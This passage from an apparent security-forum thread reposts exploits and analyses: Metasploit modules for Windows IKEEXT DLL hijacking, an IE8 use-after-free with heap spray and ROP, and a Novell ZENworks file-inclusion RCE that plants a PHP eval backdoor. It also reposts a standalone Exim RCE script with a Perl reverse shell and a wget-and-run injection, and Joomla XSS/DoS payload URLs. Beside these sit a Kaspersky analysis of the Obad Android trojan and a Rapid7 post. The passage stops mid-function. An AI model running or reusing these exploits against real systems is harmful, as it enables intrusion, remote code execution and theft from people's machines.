    'Targets' =>
    [
    [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
    [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
    ],
    'SessionTypes' => [ "meterpreter" ],
    'DefaultOptions' =>
    {
    'EXITFUNC' => 'thread',
    'WfsDelay' => 5,
    'ReverseConnectRetries' => 255
    },
    'DefaultTarget' => 0
    ))

    register_options([
    OptString.new("DIR", [ false, "Specify a directory to plant the DLL.", ""])
    ])
    @service_name = 'IKEEXT'
    @load_lib_search_path = [ '%SystemRoot%\\System32',
    '%SystemRoot%\\System',
    '%SystemRoot%'
    ]
    @non_existant_dirs = []
    end

    def check_service_exists?(service)
    srv_info = service_info(service)

    if srv_info.nil?
    print_warning("Unable to enumerate services.")
    return false
    end

    if srv_info && srv_info['Name'].empty?
    print_warning("Service #{service} does not exist.")
    return false
    else
    return true
    end
    end

    def check
    srv_info = service_info(@service_name)

    if !check_service_exists?(@service_name)
    return Exploit::CheckCode::Safe
    end

    vprint_status(srv_info.to_s)

    case srv_info['Startup']
    when 'Disabled'
    print_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...")
    return Exploit::CheckCode::Safe
    when 'Manual'
    print_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...")
    return Exploit::CheckCode::Safe
    when 'Auto'
    print_good("Service is set to Automatically start...")
    end

    if check_search_path
    return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Vulnerable
    end

    def check_search_path
    dll = 'wlbsctrl.dll'

    @load_lib_search_path.each do |path|
    dll_path = "#{expand_path(path)}\\#{dll}"

    if file_exist?(dll_path)
    print_warning("DLL already exists at #{dll_path}...")
    return true
    end
    end

    return false
    end

    def check_system_path
    print_status("Checking %PATH% folders for write access...")
    result = registry_getvaldata('HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment', 'Path')

    if result.nil?
    print_error("Unable to retrieve %PATH% from registry.")
    return
    end

    paths = result.split(';')
    paths.append(@load_lib_search_path).flatten!.uniq!

    paths.each do |p|
    path = expand_path(p)
    if exist?(path)
    if check_write_access(path)
    return path
    end
    else
    # User may be able to create the path...
    print_status("Path #{path} does not exist...")
    @non_existant_dirs << path
    end
    end

    return nil
    end

    def check_write_access(path)
    perm = check_dir_perms(path, @token)
    if perm and perm.include?('W')
    print_good ("Write permissions in #{path} - #{perm}")
    return true
    elsif perm
    vprint_status ("Permissions for #{path} - #{perm}")
    else
    vprint_status ("No permissions for #{path}")
    end

    return false
    end

    def check_dirs
    print_status("Attempting to create a non-existant PATH dir to use.")
    @non_existant_dirs.each do |dir|
    begin
    client.fs.dir.mkdir(dir)
    if exist?(dir)
    register_file_for_cleanup(dir)
    return dir
    end
    rescue Rex::Post::Meterpreter::RequestError => e
    vprint_status("Unable to create dir: #{dir} - #{e}")
    end
    end

    return nil
    end

    def check_session_arch
    if sysinfo['Architecture'] =~ /x64/i
    if payload_instance.arch.first == 'x86'
    fail_with(Exploit::Failure::BadConfig, "Wrong Payload Architecture")
    end
    else
    if payload_instance.arch.first =~ /64/i
    fail_with(Exploit::Failure::BadConfig, "Wrong Payload Architecture")
    end
    end
    end

    def exploit
    check_session_arch

    begin
    @token = get_imperstoken
    rescue Rex::Post::Meterpreter::RequestError
    vprint_error("Error while using get_imperstoken: #{e}")
    end

    fail_with(Exploit::Failure::Unknown, "Unable to retrieve token.") unless @token

    if is_system?
    fail_with(Exploit::Failure::Unknown, "Current user is already SYSTEM, aborting.")
    end

    print_status("Checking service exists...")
    if !check_service_exists?(@service_name)
    fail_with(Exploit::Failure::NoTarget, "The service doesn't exist.")
    end

    if is_uac_enabled?
    print_warning("UAC is enabled, may get false negatives on writable folders.")
    end

    if datastore['DIR'].empty?
    # If DLL already exists in system folders, we dont want to overwrite by accident
    if check_search_path
    fail_with(Exploit::Failure::NotVulnerable, "DLL already exists in system folders.")
    end

    file_path = check_system_path
    file_path ||= check_dirs # If no paths are writable check to see if we can create any of the non-existant dirs

    if file_path.nil?
    fail_with(Exploit::Failure::NotVulnerable, "Unable to write to any folders in the PATH, aborting...")
    end
    else
    # Use manually selected Dir
    file_path = datastore['DIR']
    end

    @dll_file_path = "#{file_path}\\wlbsctrl.dll"

    service_information = service_info(@service_name)

    if service_information['Startup'] == 'Disabled'
    print_status("Service is disabled, attempting to enable...")
    service_change_startup(@service_name, 'auto')
    service_information = service_info(@service_name)

    # Still disabled
    if service_information['Startup'] == 'Disabled'
    fail_with(Exploit::Failure::NotVulnerable, "Unable to enable service, aborting...")
    end
    end

    # Check architecture
    dll = generate_payload_dll

    #
    # Drop the malicious executable into the path
    #
    print_status("Writing #{dll.length.to_s} bytes to #{@dll_file_path}...")
    begin
    write_file(@dll_file_path, dll)
    register_file_for_cleanup(@dll_file_path)
    rescue Rex::Post::Meterpreter::RequestError => e
    # Can't write the file, can't go on
    fail_with(Exploit::Failure::Unknown, e.message)
    end

    #
    # Run the service, let the Windows API do the rest
    #
    print_status("Launching service #{@service_name}...")

    begin
    status = service_start(@service_name)
    if status == 1
    print_status("Service already running, attempting to restart...")
    if service_stop(@service_name) == 0
    print_status("Service stopped, attempting to start...")
    if service_start(@service_name) == 0
    print_status("Service started...")
    else
    fail_with(Exploit::Failure::Unknown, "Unable to start service.")
    end
    else
    fail_with(Exploit::Failure::Unknown, "Unable to stop service")
    end
    elsif status == 0
    print_status("Service started...")
    end
    rescue RuntimeError => e
    raise e if e.kind_of? Msf::Exploit::Failed
    if service_information['Startup'] == 'Manual'
    fail_with(Exploit::Failure::Unknown, "Unable to start service, and it does not auto start, cleaning up...")
    else
    if job_id
    print_status("Unable to start service, handler running waiting for a reboot...")
    while(true)
    break if session_created?
    select(nil,nil,nil,1)
    end
    else
    fail_with(Exploit::Failure::Unknown, "Unable to start service, use exploit -j to run as a background job and wait for a reboot...")
    end
    end
    end
    end

    end

    Sursa: IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL

  15. These are Denial of Service, XML Injection, Cross-Site Scripting and Full

    path disclosure vulnerabilities in Googlemaps plugin for Joomla.

    -------------------------

    Affected products:

    -------------------------

    Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x and

    potentially previous versions. In new version of DAVOSET I'll add a lot of

    web sites with Googlemaps plugin.

    -------------------------

    Affected vendors:

    -------------------------

    Mike Reumer

    Googlemaps Plugin - Joomla! Extensions Directory

    ----------

    Details:

    ----------

    Denial of Service (WASC-10):

    http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file

    Besides conducting DoS attack manually, it's also possible to conduct
    automated DoS and DDoS attacks with using of DAVOSET
    (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).

    XML Injection (WASC-23):

    http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml

    It's possible to include external xml-files. Which also can be used for XSS
    attack:

    XSS via XML Injection (WASC-23):

    http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml

    File xss.xml:

    <?xml version="1.0" encoding="utf-8"?>
    <feed>
    <title>XSS</title>
    <entry>
    <div
    xmlns="http://www.w3.org/1999/xhtml"><script>alert(document.cookie)</script></div>
    </entry>
    </feed>

    Cross-Site Scripting (WASC-08):

    http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E

    Full path disclosure (WASC-13):

    http://site/plugins/content/plugin_googlemap2_proxy.php

    Besides plugin_googlemap2_proxy.php, also happens
    plugin_googlemap3_proxy.php (but it has other path at web sites).

    Best wishes & regards,
    MustLive
    Administrator of Websecurity web site
    http://websecurity.com.ua

    # 3782C828C3E6E81E 1337day.com [2013-08-28] A70DB80C325E4592 #

    Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

  16. Have a Taste of Communism with a Mouthful of APT

    Posted by sinn3r in Metasploit on Jun 7, 2013 6:05:02 AM

    Screen Shot 2013-06-05 at 3.26.46 PM.pngEveryone loves a good cyber-espionage story, and we love to put China under the spotlight. Why? Because their methods work. China has some well known hacking groups that have conducted cyber-espionage-oriented attacks, such as the Elderwood Group, Unit 61398, the Nitro gang, etc. As far as we know, most of these groups tend to use some kind of 0day exploit to gain acces of the targeted organization, and then steal terabytes of data for years. However, by studying these hacking groups, we also learned that a successful APT doesn't always require an 0day, whatever gets the job done is more than enough, and NetTravler demonstrates just that.

    According to a recent research paper by Kaspersky, the Chinese-based hacking group NetTraveler tends to get their victims infected through spear-fishing attacks using exploits that are already publicly known, specifically CVE-2010-3333 and CVE-2012-0158. Although already patched, these vulnerabilities still remain effective, and are among the most exploited in recent attacks, for example: Tibetan/Uyghur activists, oil industry companies, scientific research centers, universities, private companies, governments and military contractors, etc. And of course, they've stolen more than 22+ gigabytes of data because they 1337.

    This is all kind of depressing (or amusing?) to hear especially when our memory is still fresh about HD Moore's talk about how many percent of the Internet still remain insecure, and NetTraveler kind of verifies that claim by shoving old exploits in the US government's faces. Hey guess what? As a high profile target, you can prevent that. If you run a system update, your vulnerable software will tell you your stuff is outdated. If you run a vulnerability scanner, the scanner will tell you you're waiting to be exploited. If you run a penetration testing framework like Metasploit, shells will be popped, and that should be a red flag for you.

    CVE-2012-0158 is a vulnerability in Microsoft Office. There is a Metasploit module (ms12_027_mscomctl_bof.rb) that specifically targets Office 2007 and Office 2010, written by Wei Chen and Juan Vazquez. Demo (note: target specific):

    Screen+Shot+2013-06-05+at+5.43.51+PM.png

    CVE-2010-3333 is a vulnerability in Microsoft Word. There is also a Metasploit module (ms10_087_rtf_pfragments_bof.rb) for it targeting Office 2003, 2010, and 2010. Written by ex-Metasploit Exploit Developer Joshua J. Drake. Demo:

    Screen+Shot+2013-06-05+at+5.41.58+PM.png

    Sursa: https://community.rapid7.com/community/metasploit/blog/2013/06/07/have-a-taste-of-communism-with-a-mouthful-of-apt

  17. Exim sender_address Parameter - RCE Exploit

    #!/usr/bin/env python

    ##################################################################################
    ## Exim sender_address Parameter - Remote Command Execution Exploit ##
    ##################################################################################
    ## ##
    ## Vulnerability found by RedTeam Pentesting GmbH ##
    ## https://www.redteam-pentesting.de/en/advisories/rt-sa-2013-001/ ##
    ## ##
    ## Exploit written by eKKiM ##
    ## http://rdtx.eu/exim-with-dovecot-lda-rce-exploit/ ##
    ## ##
    ##################################################################################
    ## USAGE ##
    ##################################################################################
    ## ##
    ## Edit the PERL REVERSE SHELL MY_CONNECTBACK_IP and MY_CONNECTBACK_PORT and ##
    ## upload this perl reverse shell script to a webserver. ##
    ## ##
    ## Edit the PERL_SHELL variable to your own connectback script URL ##
    ## ##
    ## Start a listener: nc -vvn -l -p CONNECT_BACK_PORT ##
    ## ##
    ## Let the exploitin begin ##
    ## ##
    ##################################################################################


    ####### PERL REVERSE SHELL #######
    ## use Socket;$i="MY_CONNECTBACK_IP";$p=MY_CONNECTBACK_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
    ####### PERL REVERSE SHELL #######


    import socket
    import sys

    ####### URL TO YOUR CONNECTBACK SHELL #######
    PERL_SHELL = "myhost.com/shell.pl"
    ####### URL TO YOUR CONNECTBACK SHELL #######

    if len(sys.argv) != 2:
    print "Usage: exim_exploit.py <target_ip> <optional_rcpt_address>"
    print " <target_ip> target you want to test"
    print " <optional_rcpt_address> an address which is accepted by exim (default: postmaster@localhost)"
    exit(1)

    RCPT_TO = "postmaster@localhost"
    HOST = sys.argv[1]
    PORT = 25

    def read_line(s):
    ret = ''

    while True:
    c = s.recv(1)

    if c == '\n' or c == '':
    break
    else:
    ret += c

    return ret


    if len(sys.argv) == 3:
    RCPT_TO = sys.argv[2]

    print "Exim sender_address Parameter - Remote Command Execution Exploit"
    print "Bug discovered by RedTeam Pentesting GmbH"
    print "Exploit created by eKKiM"
    print ""

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))

    data = read_line(s);
    if not(data.startswith("220")):
    print "[ERROR] Is it SMTP Server?"
    exit(1)

    s.send("EHLO domain.local\n")
    s.recv(4096)

    s.send("MAIL FROM: x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}" + PERL_SHELL + "``perl${IFS}/tmp/p.pl`@blaat.com\n")

    data = read_line(s);
    if not(data.startswith("250")):
    print "[ERROR] MAIL FROM not accepted"
    exit(1)

    s.send("RCPT TO: " + RCPT_TO + "\n")
    data = read_line(s);
    if not(data.startswith("250")):
    print "[ERROR] RCPT_TO not accepted"
    exit(1)

    s.send("DATA\n")
    data = read_line(s);
    if not(data.startswith("354")):
    print "[ERROR] Cannot send email content"
    exit(1)

    s.send("x\n.\n")
    data = read_line(s);
    if not(data.startswith("250")):
    print "[ERROR] email content revoked"
    exit(1)

    print "[OK] Recieved shell?"

    s.close()

    Sursa Exim sender_address Parameter - RCE Exploit

  18. The most sophisticated Android Trojan

    Roman Unuchek

    Kaspersky Lab Expert

    Posted June 06, 15:01 GMT

    0.5

    Recently, an Android application came to us for analysis. At a glance, we knew this one was special. All strings in the DEX file were encrypted, and the code was obfuscated.

    The file turned out to be a multi-functional Trojan, capable of the following: sending SMS to premium-rate numbers; downloading other malware programs, installing them on the infected device and/or sending them further via Bluetooth; and remotely performing commands in the console. Now, Kaspersky Lab’s products detect this malicious program as Backdoor.AndroidOS.Obad.a.

    android_trojan_01.png

    Malware writers typically try to make the codes in their creations as complicated as possible, to make life more difficult for anti-malware experts. However, it is rare to see concealment as advanced as Odad.a’s in mobile malware. Moreover, this complete code obfuscation was not the only odd thing about the new Trojan.

    The Trojan’s quirks

    The creators of Backdoor.AndroidOS.Obad.a found an error in the popular DEX2JAR software – this program is typically used by analysts to convert APK files into the more convenient Java Archive (JAR) format. This vulnerability spotted by the cybercriminals disrupts the conversion of Dalvik bytecode into Java bytecode, which eventually complicates the statistical analysis of the Trojan.

    Also, the cybercriminals found an error in the Android operating system which relates to the processing of the AndroidManifest.xml file. This file exists in every Android application and is used to describe the application’s structure, define its launch parameters, etc. The malware modifies AndroidManifest.xml in such a way that it does not comply with Google standards, but is still correctly processed on a smartphone thanks to the exploitation of the identified vulnerability. All of this made it extremely difficult to run dynamic analysis on this Trojan.

    The creators of Backdoor.AndroidOS.Obad.a also used yet another previously unknown error in the Android operating system. By exploiting this vulnerability, malicious applications can enjoy extended Device Administrator privileges without appearing on the list of applications which have such privileges. As a result of this, it is impossible to delete the malicious program from the smartphone after it gains extended privileges.

    Finally, Backdoor.AndroidOS.Obad.a does not have an interface and works in background mode.

    Code analysis

    In this malicious application, all external methods are called via reflection. All strings are encrypted, including the names of classes and methods.

    android_trojan_02s.png

    Each class has a local descriptor method which obtains the string required for encryption from the locally updated byte array. All strings are “hidden” in this array.

    android_trojan_03s.png

    The most important strings containing the C&C address undergo an additional stage of decryption. For this, the Trojan first checks if Internet access is available, then downloads the page facebook.com. It extracts a certain element of that page, and uses it as decryption key. Thus, Backdoor.AndroidOS.Obad.a can only decrypt C&C addresses when Internet access is available. This feature further complicates the analysis of this piece of malware.

    Some strings are additionally encrypted. The local decryptor receives a coded string in Base64 and decodes it. The decoded string is first decrypted with XOR operation with the MD5 of the key, then additionally decrypted with the MD5 of the string "UnsupportedEncodingException". To obtain the MD5 of the key, the same local decryptor decrypts yet another string, which is then used as an argument for MD5. In this way, key strings, such as the name of the function SendTextMessage, are protected.

    android_trojan_04.jpeg

    We began our analysis and were able to decipher all the strings:

    android_trojan_05s.png

    With the decryption results on hand, we were able to reproduce the application’s working algorithm.

    Obtaining privileges

    Immediately after it starts, the application attempts to obtain Device Administrator privileges.

    android_trojan_06s.jpeg

    As we wrote above, one feature of this Trojan is that the malicious application cannot be deleted once it has gained administrator privileges: by exploiting a previously unknown Android vulnerability, the malicious application enjoys extended privileges, but is not listed as an application with Device Administrator privileges

    android_trojan_07s.png

    We have already informed Google about the Device Administrator vulnerability in Android.

    With the extended Device Administrator Privileges, the Trojan can block the device’s screen for up to 10 seconds. This typically happens after the device is connected to a free Wi-Fi network or Bluetooth is activated; with a connection established, the Trojan can copy itself and other malicious applications to other devices located nearby. It’s possible that this is how Backdoor.AndroidOS.Obad.a tries to prevent the user from discovering its malicious activity.

    Also, the Trojan attempts to obtain root privileges by performing the command “su id”.

    android_trojan_08.png

    Communication with the owners

    The information about whether superuser privileges have been successfully obtained is sent to the C&C server. Obtaining root privileges can put cybercriminals in an advantageous position when executing commands on the console remotely.

    After the first launch, the malicious application collects the following information and sends it to the C&C server at androfox.com:

    MAC address of the Bluetooth device

    Name of operator

    Telephone number

    IMEI

    Phone user’s account balance

    Whether or not Device Administrator privileges have been obtained

    Local time

    The collected information is sent to the server in the form of an encrypted JSON object.

    android_trojan_09.png

    This information is sent to the current C&C server every time a connection is established. In addition the malicious program reports its current status to its owner: it sends the current table of premium numbers and prefixes to which to send text messages (the “aos” parameter), the task list (“task”), and the list of C&C servers. During the first C&C communication session, it sends a blank table and a list of C&C addresses that were decrypted as described above. During the communication session, the Trojan may receive an updated table of premium numbers and a new list of C&C addresses.

    In response, the C&C server sends another JSON object which might look like this after decryption:

    {"nextTime":1,"conf":{"key_con":"oKzDAglGINy","key_url":"3ylOp9UQwk",

    "key_die":"ar8aW9YTX45TBeY","key_cip":"lRo6JfLq9CRNd6F7IsZTyDKKg8UGE5EICh4xjzk"}}

    NextTime is the next connection to a C&C server

    conf are configuration strings.

    Configuration strings can contain instructions to connect to new C&C servers, tables of numbers with prefixes and keys with destinations for text messages, and new tasks with parameters. Besides, keys for traffic encryption (key_cip) may be sent to conf.

    Cybercriminals can also use text messages to control the Trojan. Configuration strings may also contain key strings (key_con, key_url, key_die) that the Trojan will look for in incoming text messages, and perform certain actions accordingly.

    Each incoming text message is analyzed for the presence of any of these keys. If a key is found, the appropriate action is performed:

    key_con: immediately establish a C&C connection;

    key_die: delete tasks from the database;

    key_url: connect to a new C&C server. This instruction must be followed by the new C&C address. This way the cybercriminal can create a new C&C server and send its address to infected devices in text messages containing this key. This will make all infected devices reconnect to the new server.

    If a “send text message” instruction key is found in conf, the Trojan sends a message to the numbers provided by C&C. Thus, the infected devices do not even need to have an Internet connection to receive an instruction to send charged text messages.

    android_trojan_10.png

    C&C instructions

    The Trojan receives instructions from the C&C and records them in the database. Each instruction recorded in this database contains the instruction’s sequence number; the time when it must be executed, as ordered by C&C; and parameters.

    Command list:

    Send text message. Parameters contain number and text. Replies are deleted.

    PING.

    Receive account balance via USSD.

    Act as proxy (send specified data to specified address, and communicate the response).

    Connect to specified address (clicker).

    Download a file from the server and install it.

    Send a list of applications installed on the smartphone to the server.

    Send information about an installed application specified by the C&C server.

    Send the user’s contact data to the server.

    Remote Shell. Executes commands in the console, as specified by the cybercriminal.

    Send a file to all detected Bluetooth devices.

    This command list for Obad.a enables the malicious program to spread files via Bluetooth. The C&C server sends the Trojan receives the local address of the file to be downloaded to the infected devices. On a C&C command, the malicious program scans for nearby devices with enabled Bluetooth connection, and attempts to send the downloaded file to them.

    Despite such impressive capabilities, Backdoor.AndroidOS.Obad.a is not very widespread. Over a 3-day observation period using Kaspersky Security Network data, Obad.a installation attempts made up no more than 0.15% of all attempts to infect mobile devices with various malware.

    To conclude this review, we would like to add that Backdoor.AndroidOS.Obad.a looks closer to Windows malware than to other Android Trojans, in terms of its complexity and the number of unpublished vulnerabilities it exploits. This means that the complexity of Android malware programs is growing rapidly alongside their numbers.

    Sursa https://www.securelist.com/en/blog/8106/The_most_sophisticated_Android_Trojan

  19. Microsoft Internet Explorer CVE-2013-1311 Use-After-Free Remote Code Execution Vulnerability

    Microsoft Internet Explorer is prone to a remote code-execution vulnerability.

    Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage.

    Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions.

    Internet Explorer 8 is vulnerable.

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::RopDb

    def initialize(info={})
    super(update_info(info,
    'Name' => "MS13-037 Microsoft Internet Explorer textNode Use-After-Free",
    'Description' => %q{
    This module exploits a use-after-free vulnerability in Microsoft Internet Explorer
    where a DOM textNode pointer becomes corrupted after style computation. This pointer is then overwritten when the innerHTML property on the parent object is set.
    },
    'License' => MSF_LICENSE,
    'Author' =>
    [
    'Scott Bell <scott.bell@security-assessment.com>' # Vulnerability discovery & Metasploit module
    ],
    'References' =>
    [
    [ 'CVE', '2013-1311' ],
    [ 'MSB', 'MS13-037' ],
    [ 'URL', 'http://security-assessment.com/files/documents/advisory/ms13_037_ie_textnode_uaf.pdf' ]
    ],
    'Payload' =>
    {
    'BadChars' => "\x00",
    'Space' => 812,
    'DisableNops' => true,
    'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
    },
    'DefaultOptions' =>
    {
    'InitialAutoRunScript' => 'migrate -f'
    },
    'Platform' => 'win',
    'Targets' =>
    [
    [ 'Automatic', {} ],
    [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ]
    ],
    'Privileged' => false,
    'DisclosureDate' => "June 6 2013",
    'DefaultTarget' => 0))

    register_options(
    [
    OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
    ], self.class)

    end

    def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    case nt
    when '5.1'
    os_name = 'Windows XP SP3'
    end

    targets.each do |t|
    if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
    print_status("Target selected as: #{t.name}")
    return t
    end
    end

    return nil
    end

    def heap_spray(my_target, p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

    js = %Q|

    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    for (var i=1; i < 0x300; i++) {
    heap_obj.alloc(block);
    }
    var overflow = nops.substring(0, 10);

    |

    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
    js = ::Rex::Exploitation::JSObfu.new(js)
    js.obfuscate

    end

    return js
    end

    def get_payload(t, cli)
    code = payload.encoded

    # No rop. Just return the payload.
    return code if t['Rop'].nil?

    # ROP chain generated by mona.py - See corelan.be
    case t['Rop']
    when :msvcrt
    print_status("Using msvcrt ROP")

    stack_pivot = [
    0x77c1cafb, # POP EBP # RETN [msvcrt.dll]
    0x41414141, # Junk
    0x781a04cb # POP ECX # PUSH ESP # RETN [urlmon.dll]
    ].pack("V*")

    # Set up required heap layout
    junk = "#{Rex::Text.rand_text_alpha(4)}"
    null = "\x00"*4
    valid_ptr = [0x0c0c0c0c].pack("V*")
    offset = [0x0c0c0c6c].pack("V*")
    heap_foo = junk*5 +
    valid_ptr*2 +
    junk +
    offset +
    junk*4 +
    valid_ptr +
    junk*6 +
    valid_ptr +
    null +
    junk*2

    rop_payload = heap_foo << generate_rop_payload('msvcrt', "", {'pivot'=>stack_pivot, 'target'=>'xp'})
    rop_payload << code
    end

    return rop_payload
    end

    def get_exploit(my_target, cli)
    p = get_payload(my_target, cli)
    js = heap_spray(my_target, p)

    html = %Q|
    <!doctype html>
    <html>
    <head>
    <script>
    #{js}
    function exploit() {
    var obj = document.createElement('s')
    obj.innerHTML = "??"
    document.body.appendChild(obj)

    document.styleSheets[0].cssText = "body:first-line{color:blue}"
    CollectGarbage()

    setTimeout(function(){
    for (i=0;i<1000;i++){
    obj.innerHTML = "\\u0c2c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c";
    }
    }, 500)
    }
    </script>
    <style>
    </style>
    </head>
    <body onload='setTimeout("exploit()", 2000)'>
    </body>
    </html>
    |

    return html
    end


    def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri = request.uri
    print_status("Requesting: #{uri}")

    my_target = get_target(agent)
    # Avoid the attack if no suitable target found
    if my_target.nil?
    print_error("Browser not supported, sending 404: #{agent}")
    send_not_found(cli)
    return
    end

    html = get_exploit(my_target, cli)
    html = html.gsub(/^\t\t/, '')
    print_status "Sending HTML..."
    send_response(cli, html, {'Content-Type'=>'text/html'})

    end

    end

    Sursa: http://www.securityfocus.com/bid/59752/discuss

    Microsoft Internet Explorer textNode Use-After-Free

  20. Novell ZENworks Mobile Management CVE-2013-1081 Local File Include Vulnerability

    Novell ZENworks Mobile Management is prone to a local file include vulnerability because it fails to adequately validate user-supplied input.

    An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.

    Novell ZENworks Mobile Management 2.6.0, 2.6.1 and 2.7.0 are vulnerable.

    NOTE: The CVE-2013-1082 issue has been moved to BID 60179 (Novell ZENworks Mobile Management CVE-2013-1082 Local File Include Vulnerability) to better document it.

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::EXE

    def initialize
    super(
    'Name' => 'Novell Zenworks Mobile Device Managment Local File Inclusion Vulnerability',
    'Description' => %q{
    This module attempts to gain remote code execution on a server running
    Novell Zenworks Mobile Device Management.
    },
    'Author' =>
    [
    'steponequit',
    'Andrea Micalizzi (aka rgod)' #zdi report
    ],
    'Platform' => 'win',
    'Targets' =>
    [
    [ 'Novell Zenworks Mobile Device Management on Windows', {} ],
    ],
    'DefaultTarget' => 0,
    'References' =>
    [
    ['CVE', '2013-1081'],
    ['OSVDB', '91119'],
    ['URL', 'http://www.novell.com/support/kb/doc.php?id=7011895']
    ],
    'DisclosureDate' => "Mar 13 2013",
    'License' => MSF_LICENSE
    )

    register_options([
    OptString.new('TARGETURI', [true, 'Path to the Novell Zenworks MDM install', '/']),
    OptInt.new('RPORT', [true, "Default remote port", 80])
    ], self.class)

    register_advanced_options([
    OptBool.new('SSL', [true, "Negotiate SSL connection", false])
    ], self.class)
    end

    def peer
    "#{rhost}:#{rport}"
    end

    def get_version
    version = nil

    res = send_request_raw({
    'method' => 'GET',
    'uri' => target_uri.path
    })

    if (res and res.code == 200 and res.body.to_s.match(/ZENworks Mobile Management User Self-Administration Portal/) != nil)
    version = res.body.to_s.match(/<p id="version">Version (.*)<\/p>/)[1]
    end

    return version
    end

    def check
    v = get_version
    print_status("#{peer} - Detected version: #{v || 'Unknown'}")

    if v.nil?
    return Exploit::CheckCode::Unknown
    elsif v =~ /^2\.6\.[01]/ or v =~ /^2\.7\.0/
    # Conditions based on OSVDB info
    return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
    end

    def setup_session()
    sess = Rex::Text.rand_text_alpha(8)
    cmd = Rex::Text.rand_text_alpha(8)
    res = send_request_cgi({
    'agent' => "<?php echo(eval($_GET['#{cmd}'])); ?>",
    'method' => "HEAD",
    'uri' => normalize_uri("#{target_uri.path}/download.php"),
    'headers' => {"Cookie" => "PHPSESSID=#{sess}"},
    })
    return sess,cmd
    end

    def upload_shell(session_id,cmd_var)
    fname = Rex::Text.rand_text_alpha(8)
    payload = generate_payload_exe
    cmd = "$wdir=getcwd().'\\\\..\\\\..\\\\php\\\\temp\\\\';"
    cmd << "file_put_contents($wdir.'#{fname}.exe',"
    cmd << "base64_decode(file_get_contents('php://input')));"

    res = send_request_cgi({
    'method' => 'POST',
    'uri' => normalize_uri(target_uri.path, "DUSAP.php"),
    'data' => Rex::Text.encode_base64(payload),
    'vars_get' => {
    'language' => "res/languages/../../../../php/temp/sess_#{session_id}",
    cmd_var => cmd
    }
    })
    return fname
    end

    def exec_shell(session_id,cmd_var,fname)
    cmd = "$wdir=getcwd().'\\\\..\\\\..\\\\php\\\\temp\\\\';"
    cmd << "$cmd=$wdir.'#{fname}';"
    cmd << "$output=array();"
    cmd << "$handle=proc_open($cmd,array(1=>array('pipe','w')),"
    cmd << "$pipes,null,null,array('bypass_shell'=>true));"
    cmd << "if (is_resource($handle)){fclose($pipes[1]);proc_close($handle);}"

    res = send_request_cgi({
    'method' => 'POST',
    'uri' => normalize_uri(target_uri.path, "DUSAP.php"),
    'data' => Rex::Text.encode_base64(payload),
    'vars_get' => {
    'language' => "res/languages/../../../../php/temp/sess_#{session_id}",
    cmd_var => cmd
    }
    })
    end


    def exploit()
    begin
    print_status("#{peer} - Checking application version...")
    v = get_version
    if v.nil?
    print_error("#{peer} - Unable to detect version, abort!")
    return
    end

    print_good("#{peer} - Found Version #{v}")
    print_status("#{peer} - Setting up poisoned session")
    session_id,cmd = setup_session()
    print_status("#{peer} - Uploading payload")
    fname = upload_shell(session_id,cmd)
    print_status("#{peer} - Executing payload")
    exec_shell(session_id,cmd,fname)

